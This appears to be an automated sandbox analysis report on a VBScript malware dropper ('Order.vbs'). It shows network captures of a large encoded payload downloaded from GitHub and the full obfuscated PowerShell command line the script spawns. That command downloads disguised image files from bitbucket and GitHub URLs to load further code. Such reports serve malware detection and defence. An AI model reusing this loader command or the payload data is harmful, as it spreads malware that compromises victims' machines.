                                                                                            Data Ascii: gtM'rI n)g{094(T'w8-oEJBG$mt-l=rE!@za0i+~;SYL.[*QSep@vu;4bB;S$s;Tb~C@*0(shQ\&<4ln"xl}'nY3vn!m$Afy2
                                                                                            2024-10-21 15:05:17 UTC16384INData Raw: 17 cf cc a1 dc c9 f3 a7 0f 12 04 4c ff 00 df 6a 68 ec 25 64 f3 1c 71 52 44 42 7b 47 97 11 ef 45 56 d4 9f 96 49 ef 1c d1 c2 41 49 12 7b 91 cd 24 b8 f1 08 fd 68 84 79 6e ca 4a 44 c8 a0 51 95 09 8e 3d e9 3f 0c 15 13 27 9f 20 66 84 ca 12 4c 99 3e b4 84 14 ae 07 1f de 8b 07 76 d2 3b 73 42 44 48 f5 e7 e9 42 9e 14 7e 94 b0 33 78 09 cc fe 54 05 2a 88 03 98 8e f4 22 27 cf 9a f2 ce e0 79 20 9e 28 d4 70 3a 60 a4 90 04 81 5e 81 e7 44 5a b6 83 c9 e2 82 67 d3 f5 a5 81 06 50 49 e4 83 f5 a0 08 04 cc 71 45 0e 4a bd 04 fa d1 b7 70 0d 2c 08 02 98 58 88 89 f3 a2 94 18 24 10 27 f3 af 17 07 ac cf bd 15 6e c2 80 81 cf bd 38 81 91 33 da 80 91 27 9e 3e b4 99 30 a3 fe b4 42 61 27 93 cf bd 26 46 28 57 f3 c4 cf 7a 4c ac 89 e6 bc a5 49 3e 50 68 85 30 08 93 cd 21 06 82 91 e5 fa d7 a3
                                                                                            Data Ascii: Ljh%dqRDB{GEVIAI{$hynJDQ=?' fL>v;sBDHB~3xT*"'y (p:`^DZgPIqEJp,X$'n83'>0Ba'&F(WzLI>Ph0!
                                                                                            2024-10-21 15:05:17 UTC1024INData Raw: af 91 02 b5 fc be f4 9a 95 27 88 8e f4 2a 3c 79 72 45 01 40 31 b4 f0 93 06 88 42 47 92 44 8f ce 81 ce 3b 9f 2e 68 f0 50 54 7b c8 a0 5a 77 03 cf 7a 42 1b 2e 12 af f4 a2 b8 bd 93 1c 8f 4f 4a 33 dc 18 fc 8d 37 74 f1 c7 02 90 d2 78 59 0e b7 41 3c 28 f7 8a 3b 6b 23 b9 ef 4d 90 8d a4 c4 fe bd e8 e9 57 f3 12 38 03 db b1 a4 03 1c 29 60 19 24 76 f5 a4 8c 17 07 62 07 34 45 2c ef 3d e4 f9 7a d0 ee 30 44 ab 91 48 47 d0 db a7 d2 08 1d c5 34 79 f4 a8 fa 0f 6a 65 7b 93 88 85 77 e6 98 bb 92 0a e4 a8 19 ac 08 c7 26 c6 47 77 ce c2 b8 fd 3b 8a 86 bf d8 fc 83 13 e5 eb 43 71 93 f9 c9 26 66 a3 6e af 81 dc 67 e6 1e bf fb 2a cd 71 69 91 cd a2 2b 54 d8 a5 0c 12 00 ec 79 f4 ac 3f 5a 6a 6b 9d 3f 72 e2 96 b0 a4 85 10 39 e2 2b 71 c8 e4 83 d6 8b 0b 48 24 f0 0d 66 3a bf 4e da 5d dc 15
                                                                                            Data Ascii: '*<yrE@1BGD;.hPT{ZwzB.OJ37txYA<(;k#MW8)`$vb4E,=z0DHG4yje{w&Gw;Cq&fng*qi+Ty?Zjk?r9+qH$f:N]
                                                                                            2024-10-21 15:05:17 UTC16384INData Raw: 78 03 cc cd 19 24 13 c1 11 f4 ef 48 7c e4 32 92 08 13 06 82 78 9f 4f 7e f5 e5 9e 38 a0 00 24 09 3f 58 a5 80 5b 3c 60 9e d4 29 30 7d 4c 7a d7 88 82 20 2b 83 5e ef 10 3e 6a 4d 30 77 60 51 b5 94 c0 3c 7b 8a 70 cb e3 71 ef 27 d7 b0 a6 4d ab 84 cc 11 3c 4d 28 85 03 31 f2 d0 3a d3 09 5b 81 fb 77 12 3b f7 e6 66 9c 37 77 b4 82 4c 9f 23 3d ea 30 2e 13 dc 92 79 f6 a7 16 ee 84 93 c8 90 26 6a 29 56 8b 10 bb 82 6d 8c b7 f2 80 93 c7 30 29 64 e6 07 32 a5 27 70 9e dd aa 19 0e 83 22 47 14 64 dc 04 80 38 04 71 de a1 54 a2 75 6b c1 2e 8b dd d3 ea 7d 7c e9 ad cb 7e 21 3b 54 41 1c 53 2f 18 88 3b 8c 13 f4 a3 7d ed 5c 73 c7 bd 1a ad 21 9d b9 15 5b 61 11 27 74 f6 a4 ca 42 89 e4 f1 da 83 c5 0e ff 00 50 3b 7d 3c ab ca 70 03 c1 10 3d 3b d4 89 7c 00 a4 08 40 01 44 99 1f de 81 c4 87
                                                                                            Data Ascii: x$H|2xO~8$?X[<`)0}Lz +^>jM0w`Q<{pq'M<M(1:[w;f7wL#=0.y&j)Vm0)d2'p"Gd8qTuk.}|~!;TAS/;}\s![a'tBP;}<p=;|@D
                                                                                            2024-10-21 15:05:17 UTC1024INData Raw: 8e fe 43 bd 09 68 f6 83 df d2 29 c9 6a 62 38 db de 83 ee c0 76 f4 a4 f9 1b 03 7d a1 24 00 7b 8e 24 76 a0 0b f9 48 23 ce 38 34 e1 56 ff 00 2f af 91 fa 51 3e eb f3 4f 68 e7 de 9b 00 05 42 4a 08 57 22 3c a8 c9 7e 3f 2a 14 b6 08 90 67 ca 0d 18 a3 60 32 00 03 b1 f3 a0 94 51 24 6c 68 32 0c 12 49 90 69 54 bc 40 20 13 ff 00 7e 54 90 41 4c c8 ef 46 4b 22 49 9e f5 1b af 24 8a c7 9c 8e 51 78 a0 81 d8 45 2e cd da 52 66 7b fb d4 70 65 3b 84 19 23 9e 29 62 da 77 03 cc cf 98 a1 75 2f 04 b0 b4 78 f5 ca 96 ef ca 4f 1d f9 8a 56 de ff 00 6a 86 f9 da 7c a9 8e f5 26 13 c7 1c f7 e2 85 2a 83 b8 f7 1d aa 19 54 4f 1b 5e 4b 06 32 f1 0a 5a 41 13 06 2a 71 a7 99 71 b4 f7 10 3f 4a a7 a2 e0 44 ee 82 79 a7 b6 d7 8b 6d 20 ee 93 33 dc d5 79 e9 d3 2c 43 51 c7 25 8d 60 4c 81 20 8e 0d 24 e2
                                                                                            Data Ascii: Ch)jb8v}${$vH#84V/Q>OhBJW"<~?*g`2Q$lh2IiT@ ~TALFK"I$QxE.Rf{pe;#)bwu/xOVj|&*TO^K2ZA*qq?JDym 3y,CQ%`L $


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            2192.168.2.649789185.199.108.1334431812C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2024-10-21 15:05:22 UTC121OUTGET /IJEUWAESIKA/skyapb/refs/heads/main/kgpmmrd.txt HTTP/1.1
                                                                                            Host: raw.githubusercontent.com
                                                                                            Connection: Keep-Alive
                                                                                            2024-10-21 15:05:22 UTC894INHTTP/1.1 200 OK
                                                                                            Connection: close
                                                                                            Content-Length: 624104
                                                                                            Cache-Control: max-age=300
                                                                                            Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                            Content-Type: text/plain; charset=utf-8
                                                                                            ETag: "e2e4cf46e8c93852d459f70b619a5faf0d779c9ca794122c88d51a2b6591d86e"
                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                            X-Content-Type-Options: nosniff
                                                                                            X-Frame-Options: deny
                                                                                            X-XSS-Protection: 1; mode=block
                                                                                            X-GitHub-Request-Id: 39E3:2B4F25:671EB:6F854:67166DB2
                                                                                            Accept-Ranges: bytes
                                                                                            Date: Mon, 21 Oct 2024 15:05:22 GMT
                                                                                            Via: 1.1 varnish
                                                                                            X-Served-By: cache-lga21985-LGA
                                                                                            X-Cache: MISS
                                                                                            X-Cache-Hits: 0
                                                                                            X-Timer: S1729523123.642651,VS0,VE117
                                                                                            Vary: Authorization,Accept-Encoding,Origin
                                                                                            Access-Control-Allow-Origin: *
                                                                                            Cross-Origin-Resource-Policy: cross-origin
                                                                                            X-Fastly-Request-ID: 3a47513fc721eaf79e4473ff2227f3e57fab192b
                                                                                            Expires: Mon, 21 Oct 2024 15:10:22 GMT
                                                                                            Source-Age: 0
                                                                                            2024-10-21 15:05:22 UTC1378INData Raw: 3d 3d 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                            Data Ascii: ==AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                            2024-10-21 15:05:22 UTC1378INData Raw: 44 4f 6b 76 44 34 37 77 39 4f 59 76 44 79 37 51 38 4f 30 75 44 6e 37 51 35 4f 51 75 44 6a 37 67 34 4f 45 75 44 67 37 41 33 4f 73 74 44 58 37 51 30 4f 38 73 44 4f 37 51 7a 4f 77 73 44 4c 37 77 78 4f 59 73 44 43 36 41 76 4f 6f 72 44 35 36 41 75 4f 63 72 44 32 36 67 73 4f 45 72 44 74 36 77 70 4f 55 71 44 6b 36 77 6f 4f 38 70 44 65 36 67 6d 4f 6b 70 44 56 36 77 6a 4f 30 6f 44 4d 36 41 69 4f 49 6f 44 41 35 77 66 4f 34 6e 44 39 35 51 65 4f 4d 6e 44 79 35 41 62 4f 6f 6d 44 70 35 41 61 4f 63 6d 44 6d 35 67 59 4f 45 6d 44 64 35 77 56 4f 55 6c 44 55 35 41 55 4f 38 6b 44 4c 35 51 52 4f 4d 6b 44 43 35 51 41 4f 30 6a 44 38 34 41 4f 4f 49 6a 44 77 34 77 4c 4f 34 69 44 74 34 51 4b 4f 67 69 44 6b 34 67 48 4f 77 68 44 62 34 67 47 4f 6b 68 44 56 34 41 46 4f 41 68 44 4b 34
                                                                                            Data Ascii: DOkvD47w9OYvDy7Q8O0uDn7Q5OQuDj7g4OEuDg7A3OstDX7Q0O8sDO7QzOwsDL7wxOYsDC6AvOorD56AuOcrD26gsOErDt6wpOUqDk6woO8pDe6gmOkpDV6wjO0oDM6AiOIoDA5wfO4nD95QeOMnDy5AbOomDp5AaOcmDm5gYOEmDd5wVOUlDU5AUO8kDL5QROMkDC5QAO0jD84AOOIjDw4wLO4iDt4QKOgiDk4gHOwhDb4gGOkhDV4AFOAhDK4
                                                                                            2024-10-21 15:05:22 UTC1378INData Raw: 55 6f 44 44 36 51 51 4f 38 6e 44 39 35 77 65 4f 6b 6e 44 33 35 51 64 4f 4d 6e 44 78 35 77 62 4f 30 6d 44 72 35 51 61 4f 63 6d 44 6c 35 77 59 4f 45 6d 44 66 35 51 58 4f 73 6c 44 5a 35 77 56 4f 55 6c 44 54 35 51 55 4f 38 6b 44 4e 35 77 53 4f 6b 6b 44 48 35 51 52 4f 4d 6b 44 42 34 77 50 4f 30 6a 44 37 34 51 4f 4f 63 6a 44 31 34 77 4d 4f 45 6a 44 76 34 51 4c 4f 73 69 44 70 34 77 4a 4f 55 69 44 6a 34 51 49 4f 38 68 44 64 34 77 47 4f 6b 68 44 58 34 51 46 4f 4d 68 44 52 34 77 44 4f 30 67 44 4c 34 51 43 4f 63 67 44 46 34 77 41 4f 45 63 44 2f 33 51 2f 4e 73 66 44 35 33 77 39 4e 55 66 44 7a 33 51 38 4e 38 65 44 74 33 77 36 4e 6b 65 44 6e 33 51 35 4e 4d 65 44 68 33 77 33 4e 30 64 44 62 33 51 32 4e 63 64 44 56 33 77 30 4e 45 64 44 50 33 51 7a 4e 73 63 44 4a 33 77 78
                                                                                            Data Ascii: UoDD6QQO8nD95weOknD35QdOMnDx5wbO0mDr5QaOcmDl5wYOEmDf5QXOslDZ5wVOUlDT5QUO8kDN5wSOkkDH5QROMkDB4wPO0jD74QOOcjD14wMOEjDv4QLOsiDp4wJOUiDj4QIO8hDd4wGOkhDX4QFOMhDR4wDO0gDL4QCOcgDF4wAOEcD/3Q/NsfD53w9NUfDz3Q8N8eDt3w6NkeDn3Q5NMeDh3w3N0dDb3Q2NcdDV3w0NEdDP3QzNscDJ3wx
                                                                                            2024-10-21 15:05:22 UTC1378INData Raw: 44 48 7a 51 78 4d 51 4d 44 44 7a 67 77 4d 45 4d 44 41 79 77 76 4d 34 4c 44 38 79 67 4f 41 41 41 41 58 41 55 41 45 41 6f 44 48 36 67 68 4f 55 6f 44 45 36 77 67 4f 49 6f 44 42 36 41 51 4f 38 6e 44 65 72 54 67 44 35 51 66 4f 77 6e 44 37 35 67 65 4f 6b 6e 44 34 35 77 64 4f 59 6e 44 31 35 41 64 4f 4d 6e 44 79 35 51 63 4f 41 6e 44 76 35 67 62 4f 30 6d 44 73 35 77 61 4f 6f 6d 44 70 35 41 61 4f 63 6d 44 6d 35 51 5a 4f 51 6d 44 6a 35 67 59 4f 45 6d 44 67 35 77 58 4f 34 6c 44 64 35 41 58 4f 73 6c 44 61 35 51 57 4f 67 6c 44 58 35 67 56 4f 55 6c 44 55 35 77 55 4f 49 6c 44 52 35 41 55 4f 38 6b 44 4f 35 51 54 4f 77 6b 44 4c 35 67 53 4f 6b 6b 44 49 35 77 52 4f 59 6b 44 46 35 41 52 4f 4d 6b 44 43 35 51 51 4f 41 67 44 2f 34 67 50 4f 30 6a 44 38 34 77 4f 4f 6f 6a 44 35 34
                                                                                            Data Ascii: DHzQxMQMDDzgwMEMDAywvM4LD8ygOAAAAXAUAEAoDH6ghOUoDE6wgOIoDB6AQO8nDerTgD5QfOwnD75geOknD45wdOYnD15AdOMnDy5QcOAnDv5gbO0mDs5waOomDp5AaOcmDm5QZOQmDj5gYOEmDg5wXO4lDd5AXOslDa5QWOglDX5gVOUlDU5wUOIlDR5AUO8kDO5QTOwkDL5gSOkkDI5wROYkDF5AROMkDC5QQOAgD/4gPO0jD84wOOojD54
                                                                                            2024-10-21 15:05:22 UTC1378INData Raw: 35 51 63 4f 38 6d 44 74 35 77 61 4f 6b 6d 44 6e 35 51 5a 4f 4d 6d 44 68 35 77 58 4f 30 6c 44 62 35 51 57 4f 63 6c 44 56 35 77 55 4f 45 6c 44 50 35 51 54 4f 73 6b 44 4a 35 77 52 4f 55 6b 44 44 35 51 41 4f 38 6a 44 39 34 77 4f 4f 6b 6a 44 33 34 51 4e 4f 4d 6a 44 78 34 77 4c 4f 30 69 44 72 34 51 4b 4f 63 69 44 6c 34 77 49 4f 45 69 44 66 34 51 48 4f 73 68 44 5a 34 77 46 4f 55 68 44 54 34 51 45 4f 38 67 44 4e 34 77 43 4f 6b 67 44 48 34 51 42 4f 4d 67 44 42 33 77 2f 4e 30 66 44 37 33 51 65 72 54 67 44 4e 63 66 44 31 33 77 38 4e 45 66 44 76 33 51 37 4e 73 65 44 70 33 77 35 4e 55 65 44 6a 33 51 34 4e 38 64 44 64 33 77 32 4e 6b 64 44 58 33 51 31 4e 4d 64 44 52 33 77 7a 4e 30 63 44 4c 33 51 79 4e 63 63 44 46 33 77 77 4e 45 59 44 2f 32 51 76 4e 73 62 44 35 32 77 74
                                                                                            Data Ascii: 5QcO8mDt5waOkmDn5QZOMmDh5wXO0lDb5QWOclDV5wUOElDP5QTOskDJ5wROUkDD5QAO8jD94wOOkjD34QNOMjDx4wLO0iDr4QKOciDl4wIOEiDf4QHOshDZ4wFOUhDT4QEO8gDN4wCOkgDH4QBOMgDB3w/N0fD73QerTgDNcfD13w8NEfDv3Q7NseDp3w5NUeDj3Q4N8dDd3w2NkdDX3Q1NMdDR3wzN0cDL3QyNccDF3wwNEYD/2QvNsbD52wt
                                                                                            2024-10-21 15:05:22 UTC1378INData Raw: 54 34 7a 38 37 4d 33 4f 54 53 7a 30 7a 4d 78 4d 54 48 7a 45 68 4d 76 4b 7a 70 79 6b 6f 4d 42 4b 54 65 79 45 6e 4d 4f 49 54 42 78 34 64 4d 57 48 7a 76 78 73 5a 4d 66 46 54 49 77 51 4f 4d 6f 43 54 6d 77 6f 49 4d 58 42 7a 54 41 41 41 41 38 43 41 42 77 43 77 50 4c 65 72 54 67 44 7a 67 2f 73 33 50 7a 38 6a 44 65 72 54 67 44 77 75 50 48 37 44 75 65 72 54 67 44 6b 61 50 6b 7a 6a 6c 37 34 65 72 54 67 44 4f 53 76 6a 54 37 45 44 4f 6c 67 7a 48 34 73 77 4e 74 66 7a 32 33 59 74 4e 33 5a 7a 51 32 49 68 4e 4d 55 54 70 30 6f 4c 4e 72 53 7a 6e 30 38 49 4e 79 52 6a 61 30 41 30 4d 35 50 54 32 7a 30 38 4d 42 50 54 72 7a 45 36 4d 2f 4d 7a 4e 7a 6b 78 4d 52 4d 54 43 7a 45 67 4d 35 4c 44 70 79 67 49 4d 37 44 54 38 77 63 4d 4d 36 43 6a 54 77 55 45 4d 38 41 7a 4a 41 41 41 41 34
                                                                                            Data Ascii: T4z87M3OTSz0zMxMTHzEhMvKzpykoMBKTeyEnMOITBx4dMWHzvxsZMfFTIwQOMoCTmwoIMXBzTAAAA8CABwCwPLerTgDzg/s3Pz8jDerTgDwuPH7DuerTgDkaPkzjl74erTgDOSvjT7EDOlgzH4swNtfz23YtN3ZzQ2IhNMUTp0oLNrSzn08INyRja0A0M5PT2z08MBPTrzE6M/MzNzkxMRMTCzEgM5LDpygIM7DT8wcMM6CjTwUEM8AzJAAAA4
                                                                                            2024-10-21 15:05:22 UTC1378INData Raw: 35 4d 52 4f 4c 67 54 2f 34 59 4c 4f 70 69 54 6c 34 4d 49 4f 62 63 54 75 33 41 67 4e 34 62 6a 36 32 6b 74 4e 4d 62 54 77 32 45 6f 4e 73 5a 44 57 32 77 6b 4e 44 55 7a 77 31 41 62 4e 4f 57 44 61 31 55 45 4e 38 54 7a 39 30 45 50 4e 73 54 6a 75 30 38 47 4e 49 52 44 46 7a 49 34 4d 76 4e 54 4f 7a 49 67 4d 4e 4c 44 78 79 59 72 4d 68 4b 54 63 79 6f 6c 4d 50 4a 7a 4f 79 41 6a 4d 72 49 6a 43 78 30 4e 41 41 41 41 6f 41 51 41 45 41 41 41 41 2f 73 38 50 77 65 72 54 67 44 44 65 2f 41 79 50 51 38 6a 42 65 72 54 67 44 6b 76 50 76 37 44 34 65 72 54 67 44 59 73 50 2f 36 44 75 65 72 54 67 44 45 72 50 65 72 54 67 44 35 54 61 65 72 54 67 44 51 6d 50 54 35 54 53 65 72 54 67 44 73 69 50 50 30 54 2f 39 73 65 50 63 33 6a 59 38 6b 46 50 79 73 7a 78 37 41 71 4f 37 66 6a 36 33 49 36
                                                                                            Data Ascii: 5MROLgT/4YLOpiTl4MIObcTu3AgN4bj62ktNMbTw2EoNsZDW2wkNDUzw1AbNOWDa1UEN8Tz90EPNsTju08GNIRDFzI4MvNTOzIgMNLDxyYrMhKTcyolMPJzOyAjMrIjCx0NAAAAoAQAEAAAA/s8PwerTgDDe/AyPQ8jBerTgDkvPv7D4erTgDYsP/6DuerTgDErPerTgD5TaerTgDQmPT5TSerTgDsiPP0T/9sePc3jY8kFPyszx7AqO7fj63I6
                                                                                            2024-10-21 15:05:22 UTC1378INData Raw: 44 4d 31 45 66 4e 75 52 7a 72 30 55 4a 4e 6f 51 54 48 30 73 41 4e 46 45 44 35 77 59 45 41 41 41 41 56 41 4d 41 6f 41 41 41 41 2f 30 35 50 61 35 6a 4f 39 34 61 50 4e 32 6a 51 39 59 54 50 69 30 44 48 39 49 52 50 48 77 7a 67 38 73 48 50 7a 78 44 5a 38 6f 46 50 50 78 7a 47 37 4d 75 4f 63 72 54 6f 36 4d 6d 4f 48 70 7a 4d 35 63 65 4f 44 6e 6a 68 35 41 55 4f 6d 67 7a 2f 34 73 4d 4f 45 69 7a 65 34 6f 47 4f 46 68 54 4c 34 55 43 4f 5a 67 7a 42 33 34 65 72 54 67 44 4e 6d 66 7a 33 33 45 39 4e 45 66 7a 76 33 49 37 4e 74 65 44 70 33 59 35 4e 51 65 54 68 33 38 33 4e 30 64 44 62 33 45 32 4e 62 64 6a 53 33 55 30 4e 32 63 7a 41 32 41 76 4e 61 62 6a 7a 32 45 73 4e 38 61 6a 68 32 51 6e 4e 77 55 6a 73 31 73 5a 4e 46 51 7a 75 30 4d 4b 4e 55 52 54 53 7a 41 2f 4d 50 50 44 77 7a
                                                                                            Data Ascii: DM1EfNuRzr0UJNoQTH0sANFED5wYEAAAAVAMAoAAAA/05Pa5jO94aPN2jQ9YTPi0DH9IRPHwzg8sHPzxDZ8oFPPxzG7MuOcrTo6MmOHpzM5ceODnjh5AUOmgz/4sMOEize4oGOFhTL4UCOZgzB34erTgDNmfz33E9NEfzv3I7NteDp3Y5NQeTh383N0dDb3E2NbdjS3U0N2czA2AvNabjz2EsN8ajh2QnNwUjs1sZNFQzu0MKNURTSzA/MPPDwz
                                                                                            2024-10-21 15:05:22 UTC1378INData Raw: 44 30 51 50 77 77 44 75 38 55 4b 50 56 78 44 42 37 73 65 72 54 67 44 4f 66 76 54 7a 37 67 36 4f 65 75 6a 6a 37 6b 34 4f 42 75 54 55 37 77 30 4f 48 74 7a 4f 37 51 78 4f 50 73 6a 43 36 34 76 4f 61 72 54 31 36 41 74 4f 45 72 44 6f 36 73 70 4f 57 71 54 6a 36 59 6d 4f 68 70 44 58 36 77 6b 4f 71 6f 44 48 36 41 68 4f 42 6b 54 35 35 73 62 4f 7a 6d 44 6e 35 77 59 4f 51 6c 44 52 35 55 41 4f 61 6a 54 67 34 38 47 4f 6e 64 7a 37 30 30 65 72 54 67 44 4d 79 4f 44 68 7a 34 33 4d 79 42 41 41 41 51 49 41 43 41 4f 41 2f 77 39 50 59 2f 44 31 2f 41 39 50 4c 2f 6a 68 2f 41 7a 50 73 38 44 4b 2f 51 79 50 66 38 44 47 65 72 54 67 44 45 65 50 7a 30 54 4a 39 63 41 50 30 7a 44 52 38 45 77 4f 37 76 7a 36 37 49 38 4f 5a 75 7a 63 37 45 31 4f 4c 74 54 50 37 67 7a 4f 79 73 44 4c 37 59 79
                                                                                            Data Ascii: D0QPwwDu8UKPVxDB7serTgDOfvTz7g6Oeujj7k4OBuTU7w0OHtzO7QxOPsjC64vOarT16AtOErDo6spOWqTj6YmOhpDX6wkOqoDH6AhOBkT55sbOzmDn5wYOQlDR5UAOajTg48GOndz700erTgDMyODhz43MyBAAAQIACAOA/w9PY/D1/A9PL/jh/AzPs8DK/QyPf8DGerTgDEePz0TJ9cAP0zDR8EwO7vz67I8OZuzc7E1OLtTP7gzOysDL7Yy
                                                                                            2024-10-21 15:05:22 UTC1378INData Raw: 74 50 45 37 6a 76 65 72 54 67 44 45 72 50 6f 35 7a 54 65 72 54 67 44 63 6b 50 67 34 7a 45 39 55 62 50 72 32 54 6d 39 4d 5a 50 4d 32 7a 64 39 45 56 50 41 31 44 4d 39 51 53 50 52 77 6a 2f 38 38 4b 50 44 75 54 4b 37 38 78 4f 56 73 7a 43 37 45 67 4f 37 66 7a 77 33 77 69 4e 66 61 54 44 31 59 49 4e 2f 54 44 65 7a 49 76 4d 6b 49 6a 45 78 30 66 4d 49 48 6a 70 78 6b 59 4d 71 46 44 56 78 63 54 4d 76 41 41 41 41 51 4a 41 43 41 4c 41 34 6b 4f 4f 55 6a 7a 76 34 49 47 41 41 41 41 45 41 49 41 6f 41 34 6a 41 39 38 4b 41 41 41 41 44 41 49 41 6b 41 30 6a 55 39 4d 55 4f 70 6d 54 6b 35 30 58 4f 38 41 41 41 41 51 42 41 43 41 49 41 41 41 41 50 72 79 54 6e 38 77 49 50 76 78 44 59 41 41 41 41 55 41 67 41 67 42 41 41 41 55 54 50 31 77 52 4e 4b 51 7a 65 72 54 67 44 30 55 4e 41 41
                                                                                            Data Ascii: tPE7jverTgDErPo5zTerTgDckPg4zE9UbPr2Tm9MZPM2zd9EVPA1DM9QSPRwj/88KPDuTK78xOVszC7EgO7fzw3wiNfaTD1YIN/TDezIvMkIjEx0fMIHjpxkYMqFDVxcTMvAAAAQJACALA4kOOUjzv4IGAAAAEAIAoA4jA98KAAAADAIAkA0jU9MUOpmTk50XO8AAAAQBACAIAAAAPryTn8wIPvxDYAAAAUAgAgBAAAUTP1wRNKQzerTgD0UNAA


                                                                                            Statistics

                                                                                            CPU Usage

                                                                                            Click to jump to process

                                                                                            Memory Usage

                                                                                            Click to jump to process

                                                                                            High Level Behavior Distribution

                                                                                            Click to dive into process behavior distribution

                                                                                            Behavior

                                                                                            Click to jump to process

                                                                                            System Behavior

                                                                                            General

                                                                                            Target ID:1
                                                                                            Start time:11:05:10
                                                                                            Start date:21/10/2024
                                                                                            Path:C:\Windows\System32\wscript.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Order.vbs"
                                                                                            Imagebase:0x7ff64c410000
                                                                                            File size:170'496 bytes
                                                                                            MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                                            Has elevated privileges:false
                                                                                            Has administrator privileges:false
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:3
                                                                                            Start time:11:05:11
                                                                                            Start date:21/10/2024
                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$codigo = 'WwBO#GU#d##u#FM#ZQBy#HY#aQBj#GU#U#Bv#Gk#bgB0#E0#YQBu#GE#ZwBl#HI#XQ#6#Do#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b##g#D0#I#Bb#E4#ZQB0#C4#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b#BU#Hk#c#Bl#F0#Og#6#FQ#b#Bz#DE#Mg#N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgB1#G4#YwB0#Gk#bwBu#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I#B7#C##c#Bh#HI#YQBt#C##K#Bb#HM#d#By#Gk#bgBn#Fs#XQBd#CQ#b#Bp#G4#awBz#Ck#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#B3#GU#YgBD#Gw#aQBl#G4#d##g#D0#I#BO#GU#dw#t#E8#YgBq#GU#YwB0#C##UwB5#HM#d#Bl#G0#LgBO#GU#d##u#Fc#ZQBi#EM#b#Bp#GU#bgB0#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#C##PQ#g#Ec#ZQB0#C0#UgBh#G4#Z#Bv#G0#I##t#Ek#bgBw#HU#d#BP#GI#agBl#GM#d##g#CQ#b#Bp#G4#awBz#C##LQBD#G8#dQBu#HQ#I##k#Gw#aQBu#Gs#cw#u#Ew#ZQBu#Gc#d#Bo#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgBv#HI#ZQBh#GM#a##g#Cg#J#Bs#Gk#bgBr#C##aQBu#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#Ck#I#B7#C##d#By#Hk#I#B7#C##cgBl#HQ#dQBy#G4#I##k#Hc#ZQBi#EM#b#Bp#GU#bgB0#C4#R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#K##k#Gw#aQBu#Gs#KQ#g#H0#I#Bj#GE#d#Bj#Gg#I#B7#C##YwBv#G4#d#Bp#G4#dQBl#C##fQ#g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I#By#GU#d#B1#HI#bg#g#CQ#bgB1#Gw#b##g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#Gw#aQBu#Gs#cw#g#D0#I#B##Cg#JwBo#HQ#d#Bw#HM#Og#v#C8#YgBp#HQ#YgB1#GM#awBl#HQ#LgBv#HI#Zw#v#GE#Z#Bz#HM#ZwBm#GQ#cwBn#C8#d#Bl#HM#d#Bp#G4#Zw#v#GQ#bwB3#G4#b#Bv#GE#Z#Bz#C8#aQBt#Gc#XwB0#GU#cwB0#C4#agBw#Gc#Pw#x#DQ#N##0#DE#Nw#n#Cw#I##n#Gg#d#B0#H##cw#6#C8#LwBy#GE#dw#u#Gc#aQB0#Gg#dQBi#HU#cwBl#HI#YwBv#G4#d#Bl#G4#d##u#GM#bwBt#C8#cwBh#G4#d#Bv#G0#YQBs#G8#LwBh#HU#Z#Bp#HQ#LwBt#GE#aQBu#C8#aQBt#Gc#XwB0#GU#cwB0#C4#agBw#Gc#Pw#x#DQ#N##0#DE#Nw#y#DM#Jw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bp#G0#YQBn#GU#QgB5#HQ#ZQBz#C##PQ